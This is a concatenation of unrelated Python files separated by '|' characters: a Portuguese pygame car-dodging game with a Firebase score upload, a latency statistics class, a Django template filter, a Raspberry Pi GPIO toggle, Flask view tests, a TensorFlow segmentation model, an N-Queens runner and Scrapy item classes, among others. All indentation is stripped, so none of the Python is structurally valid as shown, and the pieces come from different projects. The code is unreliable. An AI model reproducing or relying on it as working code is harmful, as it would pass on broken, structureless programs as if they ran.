faustao = pygame.mixer.Sound('faustao.wav')
brinq = pygame.mixer.Sound('roca.wav')
som = bruno
Imagem_Fundo = pygame.image.load('8bitsRoad.png')
Imagem_Fundo = pygame.transform.scale(Imagem_Fundo,(largura_da_tela,1200))
fundointro = pygame.transform.scale(fundo,(largura_da_tela,altura_da_tela))
scorefinal = pygame.transform.scale(deserto,(largura_da_tela,altura_da_tela))
def cubos_contador(cont):
font = pygame.font.SysFont(None, 40)
text = font.render("tiros: "+str(cont), True, black)
DisplayDoJogo.blit(text,(0,28))
def func_cubos(cubosx,cubosy):
gameDisplay.blit(cubo,(cubosx,cubosy))
def desvio(contar):
font = pygame.font.SysFont(None, 40)
text = font.render("Score: " + str(contar),True,green)
DisplayDoJogo.blit(text,(0,0))
def text_objects(text,cor,size):
if size == 'small':
textSurface = smallfont.render(text,True,cor)
elif size == 'medium':
textSurface = medfont.render(text,True,cor)
elif size == 'large':
textSurface = largefont.render(text,True,cor)
return textSurface,textSurface.get_rect()
def mensagem (msg,cor,y_displace=0,x_displace = 0,size='small'):
textSurf, textRect = text_objects(msg,cor,size)
textRect.center = (largura_da_tela/2) + x_displace,(altura_da_tela/2) + y_displace
DisplayDoJogo.blit(textSurf,textRect)
def botao(x,y,w,h,ic,ac,acao=None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
if x + w > mouse[0] > x and y + h > mouse[1] > y:
pygame.draw.rect(DisplayDoJogo, ac, (x,y,w,h))
if click[0] == 1:
if acao == 'play':
rostos()
if acao == 'quit':
pygame.quit()
quit()
if acao == 'ranking':
rank()
if acao == 'sim':
music_select()
if acao == 'nao':
intro()
if acao == 'mini':
loop_jogo()
if acao == 'ferrari':
loop_jogo()
if acao == 'delorean':
loop_jogo()
if acao == 'speed':
loop_jogo()
if acao == 'controles':
controle()
if acao == 'back':
intro()
if acao == 'playy':
music_select()
if acao == 'calvin':
car_select()
if acao == 'bruno':
car_select()
if acao == 'brinquedo':
car_select()
if acao == 'garrix':
car_select()
if acao == 'katy':
car_select()
if acao == 'acdc':
car_select()
if acao == 'forward':
restart()
else:
pygame.draw.rect(DisplayDoJogo, ic,(x,y,w,h))
def intro():
time.sleep(0.3)
intro = True
while intro:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
DisplayDoJogo.blit(fundointro, (0,0))
#pygame.draw.rect(DisplayDoJogo,white,[0,230,100,200])
botao(310,370,190,40,black,green,acao = 'play')
botao(310,430,190,40,black,red,acao = 'ranking')
botao(310,490,190,40,black,blue,acao = 'controles')
botao(310,550,190,40,black,yellow,acao = 'quit')
font = pygame.font.SysFont(None, 40)
text = font.render('PLAY',True,white)
gameDisplay.blit(text,(366,380))
font = pygame.font.SysFont(None, 40)
text = font.render('RANKING',True,white)
gameDisplay.blit(text,(336,440))
font = pygame.font.SysFont(None, 40)
text = font.render('CONTROLS',True,white)
gameDisplay.blit(text,(325,500))
font = pygame.font.SysFont(None, 40)
text = font.render('QUIT',True,white)
gameDisplay.blit(text,(369,560))
pygame.display.update()
def gamb():
intro()
#pag_inicial.root.destroy()
abc = ""
def tkinter():
global nome
pag_inicial = Tk()
pag_inicial.geometry('250x100+500+300')
pag_inicial.title('Nome')
nome = StringVar()
shin_doidao = Label(pag_inicial,text = "Insira o seu nome:").pack()
inserir_shin_doidao = Entry(pag_inicial,textvariable = nome).pack()
shin_chapadao = Button(pag_inicial,text = "OK", command = gamb, fg = 'black', bg = 'white').pack()
pag_inicial.mainloop()
def restart():
restart = True
while restart:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
DisplayDoJogo.blit(fundointro, (0,0))
mensagem('Play again?',red,80,0,'medium')
#mensagem(Jogador.Score,green,0,0,'medium')
botao(355,440,80,40,black,green,acao='sim')
botao(355,515,80,40,black,red,acao='nao')
font = pygame.font.SysFont(None, 40)
text = font.render('YES',True,white)
gameDisplay.blit(text,(370,450))
font = pygame.font.SysFont(None, 40)
text = font.render('NO',True,white)
gameDisplay.blit(text,(375,525))
pygame.mixer.Sound.stop(faustao)
pygame.display.update()
def rank():
rank = True
while rank:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
gameDisplay.blit(deserto,(0,0))
mensagem("RANKING",black,-265,0,'medium')
mensagem("RANKING",red,-268,3,'medium')
botao(690,550,100,40,black,yellow,acao='back')
font = pygame.font.SysFont(None, 40)
text = font.render('BACK',True,white)
gameDisplay.blit(text,(700,560))
texto = ordena_ranking(produto).split("\n")
ct = 0
for linha in texto:
mensagem(linha,black,-220 + ct*50,0,'small')
mensagem(linha,yellow,-223 + ct*50,3,'small')
ct +=1
pygame.display.update()
def controle():
controle = True
while controle:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
DisplayDoJogo.fill(white)
mensagem('Controls',red,-250,0,'medium')
mensagem('Press the space button to shoot',blue,-60,0,'small')
mensagem('Use the directionals to control the car',blue,190,0,'small')
botao(690,550,100,40,black,yellow,acao='back')
font = pygame.font.SysFont(None, 40)
text = font.render('BACK',True,white)
gameDisplay.blit(text,(700,560))
gameDisplay.blit(space,(225,150))
gameDisplay.blit(arrow,(280,300))
pygame.display.update()
def rostos():
rostos = True
while rostos:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
DisplayDoJogo.fill(grey)
mensagem('Take these faces to get points',green,-150,90,'small')
mensagem('Take this block to get ammo',yellow,220,90,'small')
mensagem('Bypass these faces',red,60,90,'small')
botao(690,550,100,40,black,green,acao='playy')
font = pygame.font.SysFont(None, 40)
text = font.render('PLAY',True,white)
gameDisplay.blit(text,(705,560))
gameDisplay.blit(haddad,(80,40))
gameDisplay.blit(vinicius,(100,160))
gameDisplay.blit(cubo,(100,490))
gameDisplay.blit(helopeq,(80,300))
gameDisplay.blit(mirpeq,(80,380))
gameDisplay.blit(lorpeq,(150,300))
gameDisplay.blit(fredpeq,(150,380))
gameDisplay.blit(orfpeq,(210,340))
pygame.display.update()
#def Score_Final():
#Score_Final = True
#while Score_Final:
#for event in pygame.event.get():
#if event.type == pygame.QUIT:
#pygame.quit()
#quit()
#DisplayDoJogo.blit(scorefinal,(0,0))
#botao(690,550,100,40,black,green,acao='forward')
#font = pygame.font.SysFont(None, 40)
#text = font.render('PLAY',True,white)
#gameDisplay.blit(text,(705,560))
#font = pygame.font.SysFont(None, 40)
#text = font.render(Jogador.Score,True,black)
#gameDisplay.blit(text,(200,200))
#pygame.display.update()
#font = pygame.font.SysFont(None, 40)
#text = font.render("Pinto",True,green)
#DisplayDoJogo.blit(text,(200,200))
#def bater(Jogador):
#print(Jogador.Score)
#pygame.mixer.Sound.stop(som)
#pygame.mixer.Sound.set_volume(faustao,1.0)
#pygame.mixer.Sound.play(faustao)
#mensagem('ERROOOOU!!!',red,0,0,'large')
#pygame.display.update()
#Ranking(Jogador.Score)
#print(produto)
#time.sleep(2)
#loop_jogo()
#Score_Final()
#restart()
class car_botao():
carro = 'mini'
def __init__(self,img,img2,x,y,w,h,acao=None):
self.img = img
self.img2 = img2
self.x = x
self.y = y
self.w = w
self.h = h
self.acao = acao
def show_car(self):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
if self.x + self.w > mouse[0] > self.x and self.y + self.h > mouse[1] > self.y:
gameDisplay.blit(self.img2,(self.x,self.y))
if click[0] == 1:
if self.x == 58 and self.y == 140:
car_botao.carro = 'ferrari'
loop_jogo()
if self.x == 442 and self.y == 140:
car_botao.carro = 'mini'
loop_jogo()
if self.x == 58 and self.y == 360:
car_botao.carro = 'delorean'
loop_jogo()
if self.x == 442 and self.y == 360:
car_botao.carro = 'speed'
loop_jogo()
else:
gameDisplay.blit(self.img,(self.x,self.y))
def car_select():
time.sleep(0.3)
sel = True
while sel:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
gameDisplay.fill(grey)
Mini_object.show_car()
Ferrari_object.show_car()
Delorean_object.show_car()
Speed_object.show_car()
mensagem('Choose your car',red,-250,0,'medium')
pygame.display.update()
Mini_object = car_botao(Mini,Mini2,442,140,300,188)
Ferrari_object = car_botao(Ferrari,Ferrari2,58,140,300,188)
Delorean_object = car_botao(Delorean2,Delorean,58,360,300,188)
Speed_object = car_botao(Speed2,Speed,442,360,300,188)
class music_botao():
musica = 'uptown'
def __init__(self,img,img2,x,y,w,h,acao=None):
self.img = img
self.img2 = img2
self.x = x
self.y = y
self.w = w
self.h = h
self.acao = acao
def show_music(self):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
if self.x + self.w > mouse[0] > self.x and self.y + self.h > mouse[1] > self.y:
gameDisplay.blit(self.img2,(self.x,self.y))
if click[0] == 1:
if self.x == 65 and self.y == 80:
music_botao.musica = 'bruno'
car_select()
if self.x == 555 and self.y == 80:
music_botao.musica = 'calvin'
car_select()
if self.x == 310 and self.y == 80:
music_botao.musica = 'brinquedo'
car_select()
if self.x == 65 and self.y == 340:
music_botao.musica = 'garrix'
car_select()
if self.x == 310 and self.y == 340:
music_botao.musica = 'katy'
car_select()
if self.x == 555 and self.y == 340:
music_botao.musica = 'acdc'
car_select()
else:
gameDisplay.blit(self.img,(self.x,self.y))
def music_select():
time.sleep(0.3)
mus = True
while mus:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
gameDisplay.fill(grey)
calvin_object.show_music()
bruno_object.show_music()
brinquedo_object.show_music()
garrix_object.show_music()
katy_object.show_music()
acdc_object.show_music()
mensagem('Choose the artist',red,-270,0,'medium')
pygame.display.update()
calvin_object = music_botao(calvin2,calvin,555,80,180,244)
bruno_object = music_botao(bruno2,bruno,65,80,180,244)
brinquedo_object = music_botao(brinquedo2,brinquedo,310,80,180,244)
garrix_object = music_botao(garrix2,garrix,65,340,180,244)
katy_object = music_botao(katy2,katy,310,340,180,244)
acdc_object = music_botao(acdc2,acdc,555,340,180,244)
def Ranking(Score):
global nometext
nometext = nome.get()
ranking = {}
ranking[nometext] = Score
produto.append(ranking)
# Troque esta URL pela de seu próprio App Firebase
FIREBASE_URL = "https://car-game.firebaseio.com/"
# Main
if __name__ == '__main__':
fb = firebase.FirebaseApplication(FIREBASE_URL, None)
# Escreve dados no Firebase
fb.put('/', "Scores", produto)
def ordena(dici):
if dici == None:
return 0
for k in dici:
return dici[k]
def ordena_ranking(produto):
ranking = ""
ordem = list(reversed(sorted(produto, key=ordena)))[:10]
for cada in ordem:
if cada == None:
continue
for i,j in cada.items():
#print(i, " : ", j)
ranking = ranking + (str(i) + " : " + str(j) + "\n")
print(ranking)
return ranking
#gameDisplay.fill(black)
def fundo(x,y):
DisplayDoJogo.blit(Imagem_Fundo,(x,y))
def imagem_carro(a,b):
DisplayDoJogo.blit(imgcarro,(a,b))
def lourenco1(r,s):
DisplayDoJogo.blit(lourenco,(r,s))
def miranda1(r,s):
DisplayDoJogo.blit(miranda,(r,s))
def orfali1(r,s):
DisplayDoJogo.blit(orfali,(r,s))
def fred1(r,s):
DisplayDoJogo.blit(fred5,(r,s))
def haddad1(r,s):
DisplayDoJogo.blit(haddad,(r,s))
def vinicius1(r,s):
DisplayDoJogo.blit(vinicius,(r,s))
def heloisa1(r,s):
DisplayDoJogo.blit(heloisa,(r,s))
DisplayDoJogo = pygame.display.set_mode((largura_da_tela,altura_da_tela))
Não_Rodar_Jogo = False
def loop_jogo():
#Imagem_Fundo = pygame.image.load('8bitsRoad.png')
#Imagem_Fundo = pygame.transform.scale(Imagem_Fundo,(largura_da_tela,1200))
def fundo(x,y):
DisplayDoJogo.blit(Imagem_Fundo,(x,y))
global imgcarro
global som
if car_botao.carro == 'ferrari':
imgcarro = img_ferrari
elif car_botao.carro == 'mini':
imgcarro = img_mini
elif car_botao.carro == 'delorean':
imgcarro = img_delorean
elif car_botao.carro == 'speed':
imgcarro = img_speed
if music_botao.musica == 'bruno':
som = uptown
elif music_botao.musica == 'calvin':
som = bottle
elif music_botao.musica == 'brinquedo':
som = brinq
elif music_botao.musica == 'garrix':
som = virus
elif music_botao.musica == 'katy':
som = firework
elif music_botao.musica == 'acdc':
som = thunder
pygame.mixer.Sound.play(som)
velocidade_fundo = 10
posição_inicial_fundo_y = -600
posição_inicial_fundo_x = 0
prof_largura = 60
prof_altura = 60
car_positionY = 475
car_positionX = 375 #esquerda = 210 , meio = 375, direita = 540 - Variando de 165
carX = 57
carY = 106
cubosx = choice([210,375,540])
cubosy = 0
cubos_speed = velocidade_fundo
cubos_compr=60
cubos_larg=66
contador = 0
lista_tiros = []
etapas = {}
etapas[5] = [1,False]
#etapas[10] = [1,False]
class Jogador:
Score = 0
class personagens:
todos = []
def __init__(self,titulo1,titulo2):
self.titulo1 = titulo1
self.titulo2 = titulo2
personagens.todos.append(self)
def posiniper(self,random1,random2):
self.titulo1 = random.choice([210,375,540])
self.titulo2 = random.randrange(random1,random2)
#for p in personagens.todos:
#if self != p:
#if p.titulo2 < self.titulo2 + prof_altura and p.titulo2 + prof_altura >= self.titulo2: #Este e o próximo if realizam todas as possíveis opções de colisão com o bloco. São expressões matemáticas
#if p.titulo1 > self.titulo1 and p.titulo1 < self.titulo1 + prof_largura or p.titulo1 + prof_largura > self.titulo1 and p.titulo1 + prof_largura < self.titulo1 + prof_largura:
#self.titulo2 += 1000
# se houver, sortear a propria posicao de novo
def posper2(self,random3,random4):
if self.titulo2 > altura_da_tela:
self.titulo2 = 0 - random.randrange(random3,random4)
self.titulo1 = random.choice([210,375,540])
Jogador.Score += 1
def crash(self):
if car_positionY < self.titulo2 + prof_altura and car_positionY + carY >= self.titulo2 + 50: #Este e o próximo if realizam todas as possíveis opções de colisão com o bloco. São expressões matemáticas
if car_positionX > self.titulo1 and car_positionX < self.titulo1 + prof_largura or car_positionX + carX > self.titulo1 and car_positionX + carX < self.titulo1 + prof_largura:
bater(Jogador)
def crash2 (self,value):
if car_positionY < self.titulo2 + prof_altura and car_positionY + carY >= self.titulo2 + 20: #Este e o próximo if realizam todas as possíveis opções de colisão com o bloco. São expressões matemáticas
if car_positionX > self.titulo1 and car_positionX < self.titulo1 + prof_largura or car_positionX + carX > self.titulo1 and car_positionX + carX < self.titulo1 + prof_largura:
Jogador.Score += value
self.titulo2 = -1500
self.titulo1 = random.choice([210,375,540])
class tiros:
altura = 40
largura = 10
def __init__(self,imagem, display, posX,posY, vX = 0, vY = 0):
self.imagem = imagem
self.posX = posX
self.posY = posY
self.vX = vX
self.vY = vY
self.display = display
def desenhar(self):
self.display.blit(self.imagem, (self.posX, self.posY))
def atualizar(self):
self.posX += self.vX
self.posY -= self.vY
def add_obstaculos(self, obst):
self.obstaculos = obst
def add_lista(self, lista_tiros):
self.lista_tiros = lista_tiros
def crash3(self):
for p in obstaculos:
if self.posY < p.titulo2 + prof_altura and self.posY + tiros.altura >= p.titulo2: #Este e o próximo if realizam todas as possíveis opções de colisão com o bloco. São expressões matemáticas
if self.posX > p.titulo1 and self.posX < p.titulo1 + prof_largura or self.posX + tiros.largura > p.titulo1 and self.posX + tiros.largura < p.titulo1 + prof_largura:
p.titulo2 = -1500
p.titulo1 = random.choice([210,375,540])
lista_tiros.remove(self)
Jogador.Score += 3
def Score_Final():
Score_Final = True
while Score_Final:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
pygame.mixer.Sound.stop(faustao)
DisplayDoJogo.blit(scorefinal,(0,0))
botao(690,550,100,40,black,green,acao='forward')
font = pygame.font.SysFont(None, 40)
text = font.render('SKIP',True,white)
gameDisplay.blit(text,(705,560))
font = pygame.font.SysFont(None, 60)
text = font.render("Score: " + str(Jogador.Score),True,black)
gameDisplay.blit(text,(330,200))
#font = pygame.font.SysFont(None, 40)
#text = font.render(str(Jogador.Score),True,black)
#gameDisplay.blit(text,(387,250))
pygame.display.update()
#font = pygame.font.SysFont(None, 40)
#text = font.render("Pinto",True,green)
#DisplayDoJogo.blit(text,(200,200))
def bater(Jogador):
print(Jogador.Score)
pygame.mixer.Sound.stop(som)
pygame.mixer.Sound.set_volume(faustao,1.0)
pygame.mixer.Sound.play(faustao)
mensagem('ERROOOOU!!!',red,0,0,'large')
pygame.display.update()
Ranking(Jogador.Score)
#print(produto)
time.sleep(1)
#loop_jogo()
Score_Final()
restart()
lor = personagens('posição_lourençoX','posição_lourençoY')
mir = personagens('posição_mirandaX','posição_mirandaY')
orf = personagens('posição_orfaliX','posição_orfaliY')
fred = personagens('posição_fredX','posição_fredY')
had = personagens('posição_haddadX','posição_haddadY')
vin = personagens('posição_viniciusX','posição_viniciusY')
hel = personagens('posição_heloisaX','posição_heloisaY')
obstaculos = [lor, mir, orf, fred, hel]
lor.posiniper(-2000,0)
mir.posiniper(-3000,0)
orf.posiniper(-2000,0)
fred.posiniper(-2500,0)
had.posiniper(-10000,0)
vin.posiniper(-5000,0)
hel.posiniper(-2500,0)
print(velocidade_fundo)
Não_Rodar_Jogo = False
while not Não_Rodar_Jogo:
for tecla in pygame.event.get():
if tecla.type == pygame.QUIT:
Não_Rodar_Jogo = True
if tecla.type == pygame.KEYDOWN:
if car_positionX == 375 and tecla.key == pygame.K_LEFT:
car_positionX = 210
elif car_positionX == 210 and tecla.key == pygame.K_RIGHT:
car_positionX = 375
elif car_positionX == 375 and tecla.key == pygame.K_RIGHT:
car_positionX = 540
elif car_positionX == 540 and tecla.key == pygame.K_LEFT:
car_positionX = 375
if tecla.key == pygame.K_SPACE:
if contador > 0:
t = tiros(bala, DisplayDoJogo, car_positionX, car_positionY, 0, 10)
t.add_obstaculos(obstaculos)
lista_tiros.append(t)
t.add_lista(lista_tiros)
contador -= 1
fundo(posição_inicial_fundo_x,posição_inicial_fundo_y)
cubos_contador(contador)
func_cubos(cubosx, cubosy)
lourenco1(lor .titulo1,lor.titulo2)
miranda1(mir.titulo1,mir.titulo2)
orfali1(orf.titulo1,orf.titulo2)
fred1(fred.titulo1,fred.titulo2)
haddad1(had.titulo1,had.titulo2)
vinicius1(vin.titulo1,vin.titulo2)
heloisa1(hel.titulo1,hel.titulo2)
lor.posper2(1000,5000)
mir.posper2(1000,5000)
orf.posper2(1000,5000)
fred.posper2(1000,5000)
had.posper2(10000,20000)
vin.posper2(10000,20000)
hel.posper2(1000,5000)
imagem_carro(car_positionX,car_positionY)
lor.crash()
mir.crash()
orf.crash()
fred.crash()
hel.crash()
vin.crash2(10)
had.crash2(20)
desvio(Jogador.Score)
posição_inicial_fundo_y += velocidade_fundo
cubosy += cubos_speed
lor.titulo2 += velocidade_fundo
mir.titulo2 += velocidade_fundo
orf.titulo2 += velocidade_fundo
fred.titulo2 += velocidade_fundo
had.titulo2 += velocidade_fundo
vin.titulo2 += velocidade_fundo
hel.titulo2 += velocidade_fundo
if car_positionX > 637 - carX or car_positionX < 157:
bater(Jogador)
if car_positionY > altura_da_tela - carY or car_positionY < 0:
bater(Jogador)
if posição_inicial_fundo_y == 0:
posição_inicial_fundo_y = -600
if car_positionY < cubosy + cubos_compr:
if car_positionX > cubosx and car_positionX < cubosx + cubos_larg or car_positionX+carX > cubosx and car_positionX + carX < cubosx + cubos_larg:
cubosy = (altura_da_tela-3000)
cubosx = choice([230,360,540])
contador+=1
else:
if cubosy > 800:
cubosy = (altura_da_tela-3000)
cubosx = choice([230,360,540])
for t in lista_tiros:
t.atualizar()
t.desenhar()
t.crash3()
#if Jogador.Score in etapas:
#if etapas[Jogador.Score][1] == False:
#velocidade_fundo += etapas[Jogador.Score][0]
#etapas[Jogador.Score][1] = True
#print('Score: %d Velocidade: %d '%(Jogador.Score, velocidade_fundo))
#pygame.mixer.Sound.stop(faustao)
pygame.display.update()
framespersecond.tick(fps)
tkinter()
intro()
controle()
rostos()
music_select()
car_select()
Score_Final()
restart()
loop_jogo()
pygame.quit()
quit()
|
class NPC:
def __init__(self, n_name, n_job, n_body, n_mind, n_charm):
self.n_name = n_name
self.n_job = n_job
self.n_body = n_body
self.n_mind = n_mind
self.n_charm = n_charm
|
import numpy as np
class LantecyCalc( object ):
def __init__(self, file_name ):
#Inicializando as variaveis
self.periods = np.array( [])
self.mean = 0.0
self.std_deviation = 0.0
self.max = 0.0
self.size = 0
#Iterando nas linhas do arquivo e lendo os periodos.
file = open( file_name, 'r' )
for line in file:
period = float(line) / 1000.0
if period > self.max:
self.max = period
pass
self.periods = np.append( self.periods, period)
# Com os dados acima, savando algumas caracteristicas de interesse
self.mean = self.periods.mean()
self.std_deviation = self.periods.std()
self.max = self.periods.max()
self.size = len( self.periods )
self.outliers = ( ( self.periods > (self.mean + 3*self.std_deviation) ) | ( self.periods < (self.mean - 3*self.std_deviation) ) ).sum() |
# -*- coding: utf-8 -*-
"""
@author: Pramod Duvvuri
"""
print('Hello World!')
# Types in Python
print(type(3.14))
print(type(None))
# Arithemtic Operations in Python
print(6 + 12 - 3)
print(2 * 3.0)
print(- - 4)
print(10/3)
print(10.0/3.0)
a = 3
print(a + 2.0)
a = a + 1.0
a
print('Rounded Integer ', round(2.6))
print(int(2.6))
# str1 = 'hello'
# str2 = ','
# str3 = 'world' |
import glob
# def load():
images = glob.glob('*vehicles/*/*')
cars = []
notcars = []
for image in images:
if 'non' in image:
notcars.append(image)
else:
cars.append(image)
## Uncomment if you need to reduce the sample size
#sample_size = 500
#cars = cars[0:sample_size]
#notcars = notcars[0:sample_size]
print('found cars:',len(cars))
print('found non-cars:',len(notcars))
# return cars, notcars |
from django import template
from provider import scope
register = template.Library()
@register.filter
def scopes(scope_int):
"""
Wrapper around :attr:`provider.scope.names` to turn an int into a list
of scope names in templates.
"""
return scope.to_names(scope_int)
|
import RPi.GPIO as GPIO
import time
from math import *
from random import *
off = True
while True:
level = int(input("Input: "))
if level > 1 or level < 0:
break
if level == 1 and off:
off = False
GPIO.setmode(GPIO.BOARD)
GPIO.setup(23, GPIO.OUT)
GPIO.output(23, 0)
elif level == 0 and not off:
off = True
GPIO.cleanup()
GPIO.cleanup()
|
from flask import url_for
def test_view_template_version(
client_request,
api_user_active,
mock_login,
mock_get_service,
mock_get_template_version,
mock_get_user,
mock_get_user_by_email,
mock_has_permissions,
fake_uuid,
):
service_id = fake_uuid
template_id = fake_uuid
version = 1
all_versions_link = url_for("main.view_template_versions", service_id=service_id, template_id=template_id)
page = client_request.get(
".view_template_version",
service_id=service_id,
template_id=template_id,
version=version,
)
template = mock_get_template_version(service_id, template_id, version)
assert api_user_active["name"] in page.text
assert template["data"]["content"] in page.text
assert all_versions_link in str(page)
mock_get_template_version.assert_called_with(service_id, template_id, version)
def test_view_template_versions(
client_request,
api_user_active,
mock_login,
mock_get_service,
mock_get_template_versions,
mock_get_service_template,
mock_get_user,
mock_get_user_by_email,
mock_has_permissions,
fake_uuid,
):
service_id = fake_uuid
template_id = fake_uuid
page = client_request.get(
".view_template_versions",
service_id=service_id,
template_id=template_id,
)
versions = mock_get_template_versions(service_id, template_id)
assert api_user_active["name"] in page.text
assert versions["data"][0]["content"] in page.text
mock_get_template_versions.assert_called_with(service_id, template_id)
|
from pylab import *
from mats.eq_conv_mat import eq_conv_mat
from mats.conv_mat import conv_mat
def frac_shift_2(img, v):
assert(((v>=0) & (v<1)).all())
c0 = array([0, 1-v[0], v[0]])
c1 = array([0, 1-v[1], v[1]])
W = c0.reshape(1,-1)*c1.reshape(-1,1)
sh_img = shape(img)
c = eq_conv_mat([sh_img[0], sh_img[1]],
[3,3],
[1,1],
[1,1])
c.w[0]=W
ans=(c*img.reshape(1,-1)).reshape(shape(img))
return ans
def gen_shift_2(img, v):
v_int = floor(v)
v_frac = v - floor(v)
a,b = shape(img)
i,j = arange(a), arange(b)
[J,I]=meshgrid(j,i)
Ish = array(I + v_int[1],'i')
Jsh = array(J + v_int[0],'i')
Ish[Ish>=a]=a-1
Jsh[Jsh>=b]=b-1
Ish[Ish<0]=0
Jsh[Jsh<0]=0
img2 = img[Ish, Jsh]
img3 = frac_shift_2(img2, v_frac)
return img3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: Yizhong
# created_at: 04/09/2018 10:23 PM
import tensorflow as tf
from .rnn import rnn
from .elmo_crf_seg import ELMOCRFSegModel
from .layers import self_attention
class AttnSegModel(ELMOCRFSegModel):
def _encode(self):
with tf.variable_scope('rnn_1'):
self.encoded_sent, _ = rnn('bi-lstm', self.embedded_inputs,
self.placeholders['input_length'],
hidden_size=self.hidden_size,
layer_num=1, concat=True)
self.encoded_sent = tf.nn.dropout(
self.encoded_sent, self.placeholders['dropout_keep_prob']
)
self.attn_outputs, self.attn_weights = self_attention(
self.encoded_sent, self.placeholders['input_length'],
self.window_size)
self.attn_outputs = tf.nn.dropout(
self.attn_outputs,
self.placeholders['dropout_keep_prob']
)
self.encoded_sent = tf.concat([self.encoded_sent, self.attn_outputs],
-1)
with tf.variable_scope('rnn_2'):
self.encoded_sent, _ = rnn('bi-lstm',
self.encoded_sent,
self.placeholders['input_length'],
hidden_size=self.hidden_size, layer_num=1, concat=True)
self.encoded_sent = tf.nn.dropout(
self.encoded_sent,
self.placeholders['dropout_keep_prob'])
|
__author__ = 'saimanoj'
import preprocessing
import sys
def main():
# preprocessing.preprocess_train(arg)
preprocessing.preprocess_test()
if __name__ == "__main__":
main()
|
import argparse
from search.BFS import BFS
from search.DFS import DFS
parser = argparse.ArgumentParser(description='This program solves the N Queens problem using blind search.')
parser.add_argument('--algo', type=str, help='Blind search algorithm to use(BFS, DFS)', default='DFS')
parser.add_argument('--nq', type=int, help='Size of the board', default=8)
parser.add_argument('--path', type=int, help='Level of verbose for path printing('
'2 [Print path of all nodes],'
'1 [Print path only of objective state],'
'0 [Print only objective state])', default=0)
args = parser.parse_args()
if args.algo == 'BFS':
search = BFS(args.nq)
elif args.algo == 'DFS':
search = DFS(args.nq)
else:
search = None
try:
search.solve(args.path)
except AttributeError:
print('Unknown algorithm. Please use BFS or DFS')
|
import scrapy
class UrlItem(scrapy.Item):
# 获取列表
url_list = scrapy.Field()
# 商店名称
shop_name=scrapy.Field()
class ShopItem(scrapy.Item):
# 商店名称
shop_name=scrapy.Field()
# 评论数目
comment_num=scrapy.Field()
# 人均消费
avg_pay=scrapy.Field()
# 口味
taste=scrapy.Field()
# 环境
environment=scrapy.Field()
# 服务
service=scrapy.Field()
# 地址
place=scrapy.Field()
# 电话
phone=scrapy.Field()
# 商店分类
shop_type = scrapy.Field()
# 营业时间
open_time = scrapy.Field()
# 评论
# comment=scrapy.Field()
# 图片组
# imglist=scrapy.Field()
#图片存储地址
# img_path=scrapy.Field()
class CommentItem (scrapy.Item):
#商店名字
shop_name=scrapy.Field()
# 商店城市
city=scrapy.Field()
# 星级
star=scrapy.Field()
# 评论人
author=scrapy.Field()
# 评论人均
avg_pay=scrapy.Field()
# 口味
taste=scrapy.Field()
# 环境
environment=scrapy.Field()
# 服务
service=scrapy.Field()
# 评价内容
comment=scrapy.Field()
# 喜欢的菜
like_dishes=scrapy.Field()
# 图片
img_url=scrapy.Field()
# 评价日期
date=scrapy.Field()
# 相册
album=scrapy.Field()
#用户id
user_id=scrapy.Field() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.